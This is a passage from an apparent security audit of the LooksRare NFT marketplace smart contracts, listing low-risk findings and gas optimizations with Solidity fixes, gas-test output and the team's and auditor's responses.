Another alternative would be to implement a "pull pattern" where the fee beneficiaries (affiliate, creator, protocol) have to withdraw their allocated fees from the contract, thus decoupling a potential failure in the transfer action from the overall item transaction. There is a trade-off between security and user experience, and it is up to the project team to make this decision. Either way, it is recommended to have a proper internal vetting process for tokens before whitelisting.
LooksRare: Acknowledged.
Spearbit: Acknowledged.

+5.3.9 viewCreatorFeeInfo's reversion depends on order of successful calls to collection.royaltyInfo
Severity: Low Risk
Context:
• CreatorFeeManagerWithRoyalties.sol#L56-L61
• CreatorFeeManagerWithRebates.sol#L51-L54
Description: The outcome of the call to viewCreatorFeeInfo for both CreatorFeeManagerWithRebates and CreatorFeeManagerWithRoyalties is dependent on the order of itemIds. Assume we have 2 itemIds with the following properties:
• itemId x, where the call to collection.royaltyInfo(x, price) is successful (status == 1) and returns (a, ...) where a ≠ 0.
• itemId y, where the call to collection.royaltyInfo(y, price) fails (status == 0).
Then, if the itemIds provided to viewCreatorFeeInfo are:
• [x, y]: the call to viewCreatorFeeInfo returns successfully, as the outcome for y will be ignored/skipped.
• [y, x]: the call to viewCreatorFeeInfo reverts with BundleEIP2981NotAllowed(collection), since the first item will be skipped, so the initial value for creator will not be set and remains address(0); when we then process the loop for x, we end up comparing a with address(0), which causes the revert.
Recommendation: Either revert the calls to viewCreatorFeeInfo when a call to collection.royaltyInfo fails, or set the creator (creatorFee) on the first successful call to collection.royaltyInfo (which might not be the first round of the loop when i = 0) and ignore all failed calls.
LooksRare: Fixed in PR 346.
Spearbit: Verified.

+5.3.10 CreatorFeeManagerWithRebates.viewCreatorFeeInfo reversion is dependent on the order of itemIds
Severity: Low Risk
Context:
• CreatorFeeManagerWithRebates.sol#L57-L64
Description: Assume there is an itemId x where collection.royaltyInfo(x, price) returns (0, _) and another itemId y where collection.royaltyInfo(y, price) returns (a, _) where a ≠ 0. Then, if the itemIds array provided to CreatorFeeManagerWithRebates.viewCreatorFeeInfo is [x, y, ...], the return parameters would be (address(0), 0), and if it is [y, x, ...], the call would revert with BundleEIP2981NotAllowed(collection).
Recommendation: The outcome of the call to CreatorFeeManagerWithRebates.viewCreatorFeeInfo should not be dependent on the order of itemIds. We should loop over all itemIds and make sure all the creators match before returning.
LooksRare: Fixed in PR 324.
Spearbit: Verified.

+5.3.11 Affiliates can trick the protocol to receive fees even when not needed
Severity: Low Risk
Context: LooksRareProtocol.sol#L440
Description: Currently, takers specify the address of an affiliate, which will get a portion of the protocol fee if it has a non-zero value in the affiliateRates mapping and the affiliate program is active. Whitelisted affiliates can trick the system either by colluding with potential takers that will set their affiliate address and later split the revenue between them, or by acting as both the taker and the affiliate (by using different addresses that belong to the same party) when trading their own items.
This, in turn, will cause a decrease in fees collected by the protocol address.
LooksRare: Acknowledged. Accepted as a business risk inherent to the feature.
Spearbit: Acknowledged.

+5.3.12 Seller might get a lower fee than expected due to front-running
Severity: Low Risk
Context: ExecutionManager.sol#L95, ExecutionManager.sol#L183
Description: The protocol has a fee structure where both the protocol and the original creator of the item charge fees, and these fees are subtracted from the seller's proceeds. This means that the seller, whether they are a maker or a taker, may receive a lower price than they expected due to sudden changes in creator or protocol fee rates.
Recommendation: The impact of the described issue is limited, since a potential loss is already capped in the current version of the code. However, it is still recommended to add a variable to the Order struct that represents the maximum fee the seller is willing to pay, and to validate that the actual fee does not exceed this value (see the sketch after 5.3.14 below). This will provide an additional layer of protection against any potential losses.
LooksRare: Acknowledged. This is a known, accepted issue, with numbers up to 5% for the protocol fee (set at the strategy) and 10% (originally 25%) for royalties. So while the default is 2% (2% protocol fee and no royalty), the total can be as high as 15% (5% protocol fee and 10% royalties). This was implemented in such a way as to simplify the backend logic for preventing orders which cannot be executed due to a mismatch between on-chain and off-chain slippage.
Spearbit: Acknowledged.

+5.3.13 StrategyManager does not emit an event when the first strategy gets added
Severity: Low Risk
Context:
• StrategyManager.sol#L32-L42
Description: StrategyManager does not emit an event when the first strategy gets added, which can cause issues for off-chain agents.
Recommendation: To make off-chain agents' data lookup easier, it would be good to also emit the NewStrategy event when the first strategy is added in StrategyManager's constructor:

constructor(address _owner) CurrencyManager(_owner) {
    strategyInfo[0] = Strategy({
        isActive: true,
        standardProtocolFeeBp: 150,
        minTotalFeeBp: 200,
        maxProtocolFeeBp: 300,
        selector: bytes4(0),
        isMakerBid: false,
        implementation: address(0)
    });
    emit NewStrategy(0, 150, 200, 300, bytes4(0), false, address(0));
}

LooksRare: Fixed in PR 313.
Spearbit: Verified.

+5.3.14 TransferSelectorNFT does not emit events when new transfer managers are added in its constructor
Severity: Low Risk
Context:
• TransferSelectorNFT.sol#L28-L32
Description: TransferSelectorNFT does not emit an event when assetTypes 0 and 1 are added in its constructor.
Recommendation: To make off-chain agents' data lookup easier, it would be best to emit NewAssetType every time a new transfer manager is added:

constructor(address _owner, address transferManager) ExecutionManager(_owner) {
    // Transfer manager with selectors for ERC721/ERC1155
    managerSelectorOfAssetType[0] = ManagerSelector({transferManager: transferManager, selector: 0xa7bc96d3});
    managerSelectorOfAssetType[1] = ManagerSelector({transferManager: transferManager, selector: 0xa0a406c6});
    emit NewAssetType(0, transferManager, 0xa7bc96d3);
    emit NewAssetType(1, transferManager, 0xa0a406c6);
}

LooksRare: Not necessary anymore since adding new asset types has been removed in PR 308.
Spearbit: Verified.
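As promised under 5.3.12, a minimal sketch of the seller-side fee cap (the maxFeeBp field, the FeeTooHigh error, and the validation point are assumptions for illustration, not the protocol's actual code):

// Sketch: the maker signs a maximum total fee (in basis points) they tolerate;
// the protocol validates the actual fees against it at execution time.
uint256 totalFeeAmount = fees[0] + fees[1]; // protocol fee + creator fee
if (totalFeeAmount * 10_000 > price * makerAsk.maxFeeBp) { // maxFeeBp: hypothetical new field
    revert FeeTooHigh(); // hypothetical error name
}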
+5.3.15 Protocol fees will be sent to address(0) if protocolFeeRecipient is not set
Severity: Low Risk
Context:
• LooksRareProtocol.sol#L452
• ExecutionManager.sol#L43
Description: Protocol fees will be sent to address(0) if protocolFeeRecipient is not set.
Recommendation: Either add a check before _transferFungibleTokens to make sure fees are only sent if protocolFeeRecipient is not address(0), or enforce that protocolFeeRecipient is set in ExecutionManager's constructor.
LooksRare: Fixed in PR 349.
Spearbit: Verified.

+5.3.16 The returned price by strategies is not validated
Severity: Low Risk
Context:
• ExecutionManager.sol#L135
• ExecutionManager.sol#L221
Description: When a taker submits an order to be executed, the price returned by the maker's chosen strategy is not validated. The current strategies do have the validations implemented, but the general upper- and lower-bound price validation should live in the protocol contract itself, since the price calculation in a potential strategy might be a complex matter that cannot be easily verified by a maker or a taker.
Related issue: "price validation in executeStrategyWithTakerAsk, executeCollectionStrategyWithTakerAsk and executeCollectionStrategyWithTakerAskWithProof can be relaxed"
Recommendation: Compare the price returned by strategies in LooksRareProtocol to the minimum and maximum prices provided by the makers and takers, and make sure it is within the correct range. This validation should be refactored out of the strategies and performed directly in the protocol:

if (makerXXX.strategyId == 0) {
    ...
} else {
    if (strategyInfo[makerXXX.strategyId].isActive) {
        ...
    } else {
        revert StrategyNotAvailable(makerXXX.strategyId);
    }
}
// Validate the returned price here.
// `maxPrice` and `minPrice` are defined based on whether it's a TakerAsk or TakerBid.
if (price > maxPrice || price < minPrice) {
    revert ...
}

The above validation indirectly also implies that minPrice <= maxPrice.
LooksRare: Acknowledged, but will not be adjusted. Checks are likely to exist in other parts of the app to reject extreme prices.
Spearbit: Acknowledged.

+5.3.17 Makers can sign (or be tricked into signing) collections of orders (using the merkle tree mechanism) that cannot be entirely canceled
Severity: Low Risk
Context:
• LooksRareProtocol.sol#L126
• LooksRareProtocol.sol#L151
• LooksRareProtocol.sol#L206
• LooksRareProtocol.sol#L567
Description: All user-facing order execution endpoints of the protocol check whether the order hash is included in the merkle tree data provided by the caller. If it is, the maker/signer is only required to sign the hash of the tree's root. A maker might sign (or get tricked into signing) a root that belongs to a tree with a high number of leaves, where each leaf encodes an order with:
• Different subsetNonce and orderNonce values (this would require canceling each nonce individually if the relevant endpoints are used).
• askNonce or bidNonce values that form a consecutive array of integers (1, ..., n) (this would require incrementing these nonces at least n times, if this method were used as a way of canceling the orders).
To cancel these orders, the maker would need to call cancelOrderNonces, cancelSubsetNonces, or incrementBidAskNonces. If the tree has a high number of nodes, it might be infeasible to cancel all the orders due to gas costs. The maker would be forced to remove their token approvals (if they are not a custom EIP-1271 maker/signer) and never use that address again to interact with the protocol.
Recommendation: Order cancelation through the different nonce mechanisms fails in the above context because there is no limit on the depth/height of the merkle tree. To mitigate this, it would be best to define an upper bound on the depth of the tree, based on some gas analysis of the cost of cancelation. Additionally, for the case where different subsetNonce, orderNonce, askNonce, or bidNonce values are used for each order included in the tree (like the example above), in order to cancel all orders in one shot, incrementBidAskNonces could be allowed to increment the askNonce or bidNonce by a number greater than the maximum number of orders allowed in the biggest tree.
LooksRare: Fixed in PR 357, PR 372, PR 422, PR 430 and PR 440.
Spearbit: Verified.

+5.3.18 The ItemIdsRange strategy allows for length mismatch in itemIds and amounts
Severity: Low Risk
Context: StrategyItemIdsRange.sol#L94
Description: There is no validation that takerAsk.itemIds.length == takerAsk.amounts.length in the ItemIdsRange strategy, despite takerAsk.itemIds and takerAsk.amounts being the return values of the executeStrategyWithTakerAsk function. If takerAsk.itemIds.length > takerAsk.amounts.length, the transaction will revert anyway when it attempts to read an index out of bounds in the main loop. However, nothing causes a revert if takerAsk.itemIds.length < takerAsk.amounts.length, and any extra values in the takerAsk.amounts array will be ignored. Most likely this issue would be caught later on in any transaction; e.g. the current TransferManager implementation checks for length mismatches. However, this TransferManager is just one possible implementation that could be added to the TransferSelectorNFT contract, so this could still be an issue.
Recommendation: Add an explicit check for length mismatches on the takerAsk.itemIds and takerAsk.amounts arrays:

 if (makerBid.itemIds.length != 2 || makerBid.amounts.length != 1) {
     revert OrderInvalid();
 }
+if (takerAsk.itemIds.length != takerAsk.amounts.length) {
+    revert OrderInvalid();
+}

LooksRare: Fixed in PR 318 and also in the Taker rewrite PR 383.
Spearbit: Verified.

+5.3.19 Spec mismatch - StrategyCollectionOffer only allows single-item orders where the spec states it should allow any amount
Severity: Low Risk
Context: StrategyCollectionOffer.sol#L46, StrategyCollectionOffer.sol#L87
Description: executeCollectionStrategyWithTakerAsk and executeCollectionStrategyWithTakerAskWithProof only allow the transfer of a single ERC721/ERC1155 item, although the specification states the strategy should support any amount.
Recommendation: While it might be just an oversight or an unclear requirement in the specification, make sure that the spec is aligned with the actual implementation.
LooksRare: Fixed in PR 347.
Spearbit: Verified.

+5.3.20 Owner of strategies that inherit from BaseStrategyChainlinkMultiplePriceFeeds can add malicious price feeds after they have been added to LooksRareProtocol
Severity: Low Risk
Context:
• BaseStrategyChainlinkMultiplePriceFeeds.sol#L49
Description: Owners of strategies that inherit from BaseStrategyChainlinkMultiplePriceFeeds can add malicious price feeds for new collections after the strategies have been added to LooksRareProtocol. It is also important to note that these strategy owners might not necessarily be the same as LooksRareProtocol's owner:
1. LooksRareProtocol's owner O_L adds strategy S.
2. Strategy's owner O_S adds a malicious price feed for a new collection T.
Recommendation: It would be best to enforce that owners of contracts inheriting from BaseStrategyChainlinkMultiplePriceFeeds are the same as LooksRareProtocol's (O_L = O_S), or to make sure that LooksRareProtocol's owner is the only entity that can add new price feeds. Note that the protocol owner can always deactivate the strategy after the fact by toggling its isActive field.
LooksRare: Acknowledged as a risk but will not adjust.
Spearbit: Acknowledged.

+5.3.21 The price calculation in StrategyDutchAuction can be more accurate
Severity: Low Risk
Context:
• StrategyDutchAuction.sol#L67-L71
Description: StrategyDutchAuction calculates the auction price as

uint256 duration = makerAsk.endTime - makerAsk.startTime;
uint256 decayPerSecond = (startPrice - makerAsk.minPrice) / duration;
uint256 elapsedTime = block.timestamp - makerAsk.startTime;
price = startPrice - elapsedTime * decayPerSecond;

One of the shortcomings of the above calculation is that division comes before multiplication, which can amplify the rounding error of the division.
Recommendation: It is recommended to perform the price calculation as below:

uint256 startTime = makerAsk.startTime;
uint256 endTime = makerAsk.endTime;
price = (
    (endTime - block.timestamp) * startPrice +
    (block.timestamp - startTime) * makerAsk.minPrice
) / (endTime - startTime);

LooksRare: Fixed in PR 309.
Spearbit: Verified.

+5.3.22 Incorrect isMakerBidValid logic in ItemIdsRange execution strategy
Severity: Low Risk
Context: StrategyItemIdsRange.sol#L115
Description: If an ItemIdsRange order has makerBid.itemIds[0] == 0, it is treated as invalid by the corresponding isMakerBidValid function. Since makerBid.itemIds[0] is the minItemId value, and since many NFT collections contain NFTs with id 0, this is incorrect (and does not match the logic of the ItemIdsRange executeStrategyWithTakerAsk function). As a consequence, frontends that filter orders based on the isMakerBidValid function will ignore certain orders, even though they are valid.
Recommendation: Changing the check to makerBid.itemIds[1] == 0 is one possible fix, since an order with a maxItemId of 0 is certainly invalid (as minItemId can't possibly be smaller than it). However, minItemId >= maxItemId is already checked later on in the function, so it is recommended to simply remove the check altogether:

-if (makerBid.itemIds.length != 2 || makerBid.amounts.length != 1 || makerBid.itemIds[0] == 0) {
+if (makerBid.itemIds.length != 2 || makerBid.amounts.length != 1) {
     return (isValid, OrderInvalid.selector);
 }

LooksRare: Fixed in PR 304.
Spearbit: Verified.

5.4 Gas Optimization

+5.4.1 amount = makerAsk.amounts[i] can be defined earlier in StrategyUSDDynamicAsk.executeStrategyWithTakerBid
Severity: Gas Optimization
Context:
• StrategyUSDDynamicAsk.sol#L66-L70
Description: makerAsk.amounts[i] is used in the if statement for order validation prior to being stored in the variable amount.
Recommendation: Define amount earlier in executeStrategyWithTakerBid's for loop to avoid decoding this value from calldata multiple times (this optimizes the valid path/orders):

@@ -63,12 +63,12 @@ contract StrategyUSDDynamicAsk is BaseStrategy, BaseStrategyChainlinkPriceLatenc
         }
         for (uint256 i; i < itemIdsLength; ) {
-            if (makerAsk.itemIds[i] != takerBid.itemIds[i] || makerAsk.amounts[i] != takerBid.amounts[i]) {
+            uint256 amount = makerAsk.amounts[i];
+            if (makerAsk.itemIds[i] != takerBid.itemIds[i] || amount != takerBid.amounts[i]) {
                 revert OrderInvalid();
             }
-            uint256 amount = makerAsk.amounts[i];
             if (amount != 1) {
                 if (amount == 0) {
                     revert OrderInvalid();

testCannotExecuteIfNotWETHOrETH() (gas: -231 (-0.025%))
testUSDDynamicAskBidderOverpaid() (gas: -231 (-0.082%))
testUSDDynamicAskUSDValueLessThanMinAcceptedEthValue() (gas: -231 (-0.082%))
testUSDDynamicAskUSDValueLessThanOneETH() (gas: -231 (-0.082%))
testUSDDynamicAskUSDValueGreaterThanOrEqualToMinAcceptedEthValue() (gas: -231 (-0.082%))
testTakerBidTooLow() (gas: -231 (-0.128%))
testItemIdsMismatch() (gas: 251 (0.144%))
testAmountGreaterThanOneForERC721() (gas: -231 (-0.148%))
testZeroAmount() (gas: -231 (-0.148%))
testOraclePriceNotRecentEnough() (gas: -231 (-0.149%))
testUSDDynamicAskInvalidChainlinkPrice() (gas: -462 (-0.161%))
Overall gas change: -2290 (-0.944%)

LooksRare: Not relevant anymore as amount checks have been moved to the transfer manager (see PR 386).
Spearbit: Verified.

+5.4.2 Restructure struct definitions in OrderStructs in a more optimized format
Severity: Gas Optimization
Context:
• OrderStructs.sol
Description: The maker and taker ask and bid structs include the fields itemIds and amounts. For most strategies, these two arrays are supposed to have the same length (except for StrategyItemIdsRange). Even for StrategyItemIdsRange one can either:
• Relax the requirement that makerBid.amounts.length == 1 (replacing it with a requirement that amounts and itemIds both have length 2) by allowing an unused extra amount, or
• not use makerBid.amounts and makerBid.itemIds and instead grab those 3 parameters from the additionalParameters field. This might actually make more sense, since in the case of StrategyItemIdsRange the itemIds and amounts carry information that deviates from what they are intended to be used for.
Recommendation: Transform the maker and taker bid and ask structs from

struct XakerXxx {
    ...
    uint256[] itemIds;
    uint256[] amounts;
    bytes additionalParameters;
}

into:

struct Item {
    uint256 itemId;
    uint256 amount;
}

struct XakerXxx {
    ...
    Item[] items;
    bytes additionalParameters;
}

This has a few benefits:
• The 1-1 correspondence between amounts and item ids is enforced by definition, and we can remove the extra checks that currently exist to enforce it (XakerXxx.amounts.length == XakerXxx.itemIds.length).
• The calldata and memory encoding of XakerXxx will be more compact.
Related issue: "Constraints among the number of item ids and amounts for taker or maker bids or asks are inconsistent among different strategies"
LooksRare: We will not implement the Item struct and the removal of itemIds/amounts from taker structs, and will use additionalParameters when needed. We have added additionalParameters for StrategyItemIdsRange in PR 340.
Spearbit: Verified.

+5.4.3 if/else block in executeMultipleTakerBids can be simplified/optimized
Severity: Gas Optimization
Context:
• LooksRareProtocol.sol#L208-L222
Description / Recommendation: The if/else block in executeMultipleTakerBids can be simplified/optimized by using the continue keyword and placing the else branch's body in the outer scope:

// If atomic, it uses the executeTakerBid function; if not atomic, it uses a catch/revert pattern with an external function
if (isAtomic) {
    // Execute the transaction and add protocol fee
    totalProtocolFeeAmount += _executeTakerBid(takerBid, makerAsk, msg.sender, orderHash);
    unchecked {
        ++i;
    }
    continue;
}
try this.restrictedExecuteTakerBid(takerBid, makerAsk, msg.sender, orderHash) returns (
    uint256 protocolFeeAmount
) {
    totalProtocolFeeAmount += protocolFeeAmount;
} catch {}
unchecked {
    ++i;
}

testThreeTakerBidsERC721OneFails() (gas: -24 (-0.002%))
Overall gas change: -24 (-0.002%)

LooksRare: Fixed in PR 323.
Spearbit: Verified.

+5.4.4 Cache currency in executeTakerAsk and executeTakerBid
Severity: Gas Optimization
Context:
• LooksRareProtocol.sol#L112
• LooksRareProtocol.sol#L139
Description: currency is read multiple times from calldata in executeTakerAsk and executeTakerBid.
Recommendation: We can cache currency to optimize these 2 functions:

@@ -116,8 +116,9 @@ contract LooksRareProtocol is
         OrderStructs.MerkleTree calldata merkleTree,
         address affiliate
     ) external nonReentrant {
+        address currency = makerBid.currency;
         // Verify whether the currency is whitelisted but is not ETH (address(0))
-        if (!isCurrencyWhitelisted[makerBid.currency] || makerBid.currency == address(0)) {
+        if (!isCurrencyWhitelisted[currency] || currency == address(0)) {
             revert WrongCurrency();
         }
@@ -129,7 +130,7 @@ contract LooksRareProtocol is
         uint256 totalProtocolFeeAmount = _executeTakerAsk(takerAsk, makerBid, orderHash);
         // Pay protocol fee (and affiliate fee if any)
-        _payProtocolFeeAndAffiliateFee(makerBid.currency, signer, affiliate, totalProtocolFeeAmount);
+        _payProtocolFeeAndAffiliateFee(currency, signer, affiliate, totalProtocolFeeAmount);
     }
@@ -142,8 +143,9 @@ contract LooksRareProtocol is
         OrderStructs.MerkleTree calldata merkleTree,
         address affiliate
     ) external payable nonReentrant {
+        address currency = makerAsk.currency;
         // Verify whether the currency is whitelisted
-        if (!isCurrencyWhitelisted[makerAsk.currency]) {
+        if (!isCurrencyWhitelisted[currency]) {
             revert WrongCurrency();
         }
@@ -154,7 +156,7 @@ contract LooksRareProtocol is
         uint256 totalProtocolFeeAmount = _executeTakerBid(takerBid, makerAsk, msg.sender, orderHash);
         // Pay protocol fee amount (and affiliate fee if any)
-        _payProtocolFeeAndAffiliateFee(makerAsk.currency, msg.sender, affiliate, totalProtocolFeeAmount);
+        _payProtocolFeeAndAffiliateFee(currency, msg.sender, affiliate, totalProtocolFeeAmount);
         // Return ETH if any
         _returnETHIfAnyWithOneWeiLeft();

testTakerBidMultipleOrdersSignedERC721WrongMerkleProof() (gas: -1 (-0.000%))
testTakerBidMultipleOrdersSignedERC721() (gas: -149 (-0.000%))
testCannotExecuteTransactionIfMakerBidWithStrategyForMakerAsk() (gas: -1 (-0.000%))
testTakerAskMultipleOrdersSignedERC721() (gas: -302 (-0.000%))
testTakerBidTooLow(uint256) (gas: -1 (-0.000%))
testItemIdsMismatch() (gas: -1 (-0.000%))
testStartPriceTooLow() (gas: -1 (-0.000%))
testItemIdsAndAmountsLengthMismatch() (gas: -1 (-0.000%))
testInactiveStrategy() (gas: -1 (-0.000%))
testZeroItemIdsLength() (gas: -1 (-0.000%))
testTakerBidReentrancy() (gas: -1 (-0.000%))
testCannotExecuteIfNotWETHOrETH() (gas: -1 (-0.000%))
testWrongAmounts() (gas: -2 (-0.000%))
testCannotTradeIfWrongCurrency() (gas: -1 (-0.000%))
testCannotTransferIfNoManagerSelectorForAssetType() (gas: -1 (-0.000%))
testCannotTradeIfDomainSeparatorHasBeenUpdated() (gas: -1 (-0.000%))
testCannotTradeIfChainIdHasChanged() (gas: -1 (-0.000%))
testCannotTradeIfWrongAmounts() (gas: -2 (-0.000%))
testFloorFromChainlinkPremiumWrongCurrency() (gas: -1 (-0.000%))
testFloorFromChainlinkPremiumWrongCurrency() (gas: -1 (-0.000%))
testFloorFromChainlinkPremiumBidTooLow() (gas: -1 (-0.000%))
testFloorFromChainlinkPremiumBidTooLow() (gas: -1 (-0.000%))
testCannotExecuteOrderIfWrongUserGlobalAskNonce() (gas: -1 (-0.000%))
testInactiveStrategy() (gas: -1 (-0.000%))
testInactiveStrategy() (gas: -1 (-0.000%))
testFloorFromChainlinkPremiumTakerBidAmountNotOne() (gas: -1 (-0.000%))
testFloorFromChainlinkPremiumTakerBidAmountNotOne() (gas: -1 (-0.000%))
testFloorFromChainlinkPremiumMakerAskTakerBidItemIdsMismatch() (gas: -1 (-0.000%))
testTakerAskUnsortedItemIds() (gas: -154 (-0.013%)) testTakerAskDuplicatedItemIds() (gas: -154 (-0.013%)) testTakerAskOfferedAmountNotEqualToDesiredAmount() (gas: -154 (-0.013%)) testMakerBidAmountLengthIsNotOne() (gas: -154 (-0.013%)) testInactiveStrategy() (gas: -154 (-0.013%)) testInactiveStrategy() (gas: -154 (-0.014%)) testTakerAskReentrancy() (gas: -154 (-0.015%)) testCreatorRoyaltiesRevertForEIP2981WithBundlesIfInfoDiffer() (gas: -154 (-0.017%)) testTakerBidERC721BundleWithRoyaltiesFromRegistry() (gas: -149 (-0.019%)) testCreatorRoyaltiesRevertIfFeeHigherThanLimit() (gas: -155 (-0.021%)) testTakerBidERC721WithRoyaltiesFromRegistry(uint256) (gas: -149 (-0.021%)) testTakerBidERC721BundleNoRoyalties() (gas: -149 (-0.021%)) testTakerBidERC721WithRoyaltiesFromRegistryWithDelegation() (gas: -149 (-0.021%)) testTakerBidERC721WithAffiliateButWithoutRoyalty() (gas: -149 (-0.022%)) testTakerAskCollectionOrderWithMerkleTreeERC721() (gas: -302 (-0.023%)) testTokenIdsRangeERC721() (gas: -302 (-0.024%)) testTakerBidERC721WithAddressZeroSpecifiedAsRecipient(uint256) (gas: -149 (-0.024%)) testMakerBidItemIdsLengthIsNotTwo() (gas: -308 (-0.025%)) testCannotExecuteAnOrderWhoseNonceIsCancelled() (gas: -154 (-0.025%)) testTakerAskRevertIfAmountIsZeroOrGreaterThanOneERC721() (gas: -308 (-0.026%)) testMakerBidItemIdsLowerBandHigherThanOrEqualToUpperBand() (gas: -308 (-0.026%)) testTokenIdsRangeERC1155() (gas: -302 (-0.026%)) testCreatorRoyaltiesGetPaidForERC2981WithBundles() (gas: -302 (-0.028%)) testCreatorRoyaltiesGetPaidForERC2981WithBundles() (gas: -302 (-0.030%)) testCreatorRoyaltiesRevertForEIP2981WithBundlesIfInfoDiffer() (gas: -308 (-0.031%)) testZeroAmount() (gas: -154 (-0.031%)) testBidAskAmountMismatch() (gas: -154 (-0.032%)) testPriceMismatch() (gas: -154 (-0.032%)) testCannotExecuteAnotherOrderAtNonceIfExecutionIsInProgress() (gas: -456 (-0.036%)) testCreatorRebatesArePaidForRoyaltyFeeManagerWithBundles() (gas: -302 (-0.037%)) testCreatorRoyaltiesGetPaidForRoyaltyFeeManagerWithBundles() (gas: -302 (-0.037%)) testMultiFill() (gas: -604 (-0.039%)) testTakerAskERC721BundleWithRoyaltiesFromRegistry() (gas: -302 (-0.039%)) testTakerBidCannotTransferSandboxWithERC721AssetTypeButERC1155AssetTypeWorks() (gas: -150 (-0.041%)) 26 testTakerAskERC721WithRoyaltiesFromRegistryWithDelegation() (gas: -302 (-0.043%)) testTakerAskERC721BundleNoRoyalties() (gas: -302 (-0.044%)) testTakerAskERC721WithRoyaltiesFromRegistry(uint256) (gas: -302 (-0.044%)) testCreatorRoyaltiesGetPaidForRoyaltyFeeManager() (gas: -302 (-0.045%)) testCreatorRebatesArePaidForRoyaltyFeeManager() (gas: -302 (-0.045%)) testTakerAskERC721WithAffiliateButWithoutRoyalty() (gas: -302 (-0.046%)) testCreatorRoyaltiesGetPaidForERC2981() (gas: -302 (-0.046%)) testCreatorRebatesArePaidForERC2981() (gas: -302 (-0.046%)) testTakerBidGasGriefing() (gas: -149 (-0.046%)) testFloorFromChainlinkPremiumBasisPointsDesiredSalePriceLessThanMinPrice() (gas: -149 (-0.047%)) testFloorFromChainlinkPremiumFixedAmountDesiredSalePriceEqualToMinPrice() (gas: -149 (-0.047%)) testFloorFromChainlinkPremiumFixedAmountDesiredSalePriceLessThanMinPrice() (gas: -149 (-0.047%)) testFloorFromChainlinkPremiumFixedAmountDesiredSalePriceGreaterThanMinPrice() (gas: -149 (-0.047%)) testFloorFromChainlinkPremiumBasisPointsDesiredSalePriceGreaterThanMinPrice() (gas: -149 (-0.048%)) testFloorFromChainlinkPremiumBasisPointsDesiredSalePriceEqualToMinPrice() (gas: -149 (-0.048%)) testTakerAskCollectionOrderERC721(uint256) (gas: -302 (-0.050%)) 
testTakerAskERC721WithAddressZeroSpecifiedAsRecipient(uint256) (gas: -302 (-0.051%)) testUSDDynamicAskBidderOverpaid() (gas: -149 (-0.053%)) testUSDDynamicAskUSDValueLessThanMinAcceptedEthValue() (gas: -149 (-0.053%)) testUSDDynamicAskUSDValueLessThanOneETH() (gas: -149 (-0.053%)) testUSDDynamicAskUSDValueGreaterThanOrEqualToMinAcceptedEthValue() (gas: -149 (-0.053%)) testAmountsMismatch() (gas: -308 (-0.054%)) testItemIdsLengthNotOne() (gas: -308 (-0.054%)) testAmountsLengthNotOne() (gas: -308 (-0.054%)) testCannotExecuteAnOrderTwice() (gas: -456 (-0.067%)) testFloorFromChainlinkDiscountWrongCurrency() (gas: -154 (-0.072%)) testFloorFromChainlinkDiscountWrongCurrency() (gas: -154 (-0.072%)) testFloorFromChainlinkDiscountAskTooHigh() (gas: -154 (-0.073%)) testFloorFromChainlinkDiscountAskTooHigh() (gas: -154 (-0.073%)) testInactiveStrategy() (gas: -154 (-0.073%)) testFloorFromChainlinkDiscountBasisPointsDesiredDiscountBasisPointsEqualTo10000() (gas: -154 (-0.073%)) testInactiveStrategy() (gas: -154 (-0.074%)) testFloorFromChainlinkDiscountTakerAskZeroAmount() (gas: -154 (-0.074%)) testFloorFromChainlinkDiscountTakerAskZeroAmount() (gas: -154 (-0.075%)) testFloorFromChainlinkDiscountTakerAskAmountsLengthNotOne() (gas: -154 (-0.075%)) testFloorFromChainlinkDiscountTakerAskAmountsLengthNotOne() (gas: -154 (-0.075%)) testFloorFromChainlinkDiscountTakerAskItemIdsLengthNotOne() (gas: -154 (-0.075%)) testFloorFromChainlinkDiscountTakerAskItemIdsLengthNotOne() (gas: -154 (-0.075%)) testCannotExecuteOrderIfWrongUserGlobalBidNonce() (gas: -154 (-0.079%)) testFloorFromChainlinkDiscountOraclePriceNotRecentEnough() (gas: -154 (-0.081%)) testFloorFromChainlinkDiscountOraclePriceNotRecentEnough() (gas: -154 (-0.082%)) testFloorFromChainlinkDiscountMakerBidAmountNotOne() (gas: -154 (-0.082%)) testFloorFromChainlinkDiscountMakerBidAmountNotOne() (gas: -154 (-0.082%)) testFloorFromChainlinkDiscountMakerBidAmountsLengthNotOne() (gas: -154 (-0.083%)) testFloorFromChainlinkDiscountMakerBidAmountsLengthNotOne() (gas: -154 (-0.083%)) testWrongAmounts() (gas: -616 (-0.084%)) testFloorFromChainlinkDiscountChainlinkPriceLessThanOrEqualToZero() (gas: -308 (-0.091%)) testFloorFromChainlinkDiscountChainlinkPriceLessThanOrEqualToZero() (gas: -308 (-0.091%)) testFloorFromChainlinkDiscountPriceFeedNotAvailable() (gas: -154 (-0.093%)) testFloorFromChainlinkDiscountPriceFeedNotAvailable() (gas: -154 (-0.093%)) testFloorFromChainlinkDiscountBasisPointsDesiredDiscountedPriceGreaterThanOrEqualToMaxPrice() (gas: ,! testFloorFromChainlinkDiscountBasisPointsDesiredDiscountedPriceLessThanMaxPrice() (gas: -302 (-0.097%)) testFloorFromChainlinkDiscountFixedAmountDesiredDiscountedPriceGreaterThanOrEqualToMaxPrice() (gas: ,! testFloorFromChainlinkDiscountFixedAmountDesiredDiscountedPriceLessThanMaxPrice() (gas: -302 (-0.098%)) testMerkleRootLengthIsNot32() (gas: -154 (-0.107%)) testCannotTradeIfETHIsUsedForMakerBid() (gas: -154 (-0.108%)) testFloorFromChainlinkDiscountFixedAmountDesiredDiscountedAmountGreaterThanOrEqualToFloorPrice() (gas: ,! testTakerAskCannotTransferSandboxWithERC721AssetTypeButERC1155AssetTypeWorks() (gas: -456 (-0.128%)) testCannotValidateOrderIfWrongFormat() (gas: -930 (-0.161%)) -308 (-0.112%)) -302 (-0.097%)) -302 (-0.098%)) 27 testCannotValidateOrderIfWrongTimestamps() (gas: -462 (-0.183%)) Overall gas change: -23356 (-5.321%) LooksRare: Fixed in PR 323. Spearbit: Verfied. 
+5.4.5 Cache operators[i] in grantApprovals and revokeApprovals
Severity: Gas Optimization
Context:
• TransferManager.sol#L177-L192
• TransferManager.sol#L207-L216
Description: operators[i] is used 3 times in grantApprovals's for loop (and twice in revokeApprovals's).
Recommendation: One can optimize the loops by caching operators[i]:

@@ -175,15 +175,16 @@ contract TransferManager is ITransferManager, LowLevelERC721Transfer, LowLevelER
         for (uint256 i; i < length; ) {
-            if (!isOperatorWhitelisted[operators[i]]) {
+            address operator = operators[i];
+            if (!isOperatorWhitelisted[operator]) {
                 revert NotWhitelisted();
             }
-            if (hasUserApprovedOperator[msg.sender][operators[i]]) {
